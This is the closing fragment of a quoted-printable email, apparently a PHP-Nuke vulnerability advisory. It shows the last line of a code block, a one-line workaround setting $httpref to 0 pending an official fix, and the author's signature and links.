&nbsp;&nbsp; exit(0);<br>}<br>---<br><br><br>4.Fix<br>Set variable $httpref=
=3D0 until php-nuke company&nbsp; will publish oficial fix<br><br>Maciej `k=
rasza` Kukla<br><a href=3D"mailto:krasza@gmail.com">
krasza@gmail.com</a><br><a href=3D"http://www.krasza.int.pl">www.krasza.int=
.pl</a><br><br><a href=3D"http://www.krewniacy.pl">http://www.krewniacy.pl<=
/a><br><br><br>-- <br>Best regards, Maciej `krasza` Kukla<br>

------=_Part_70549_10889112.1171994685834--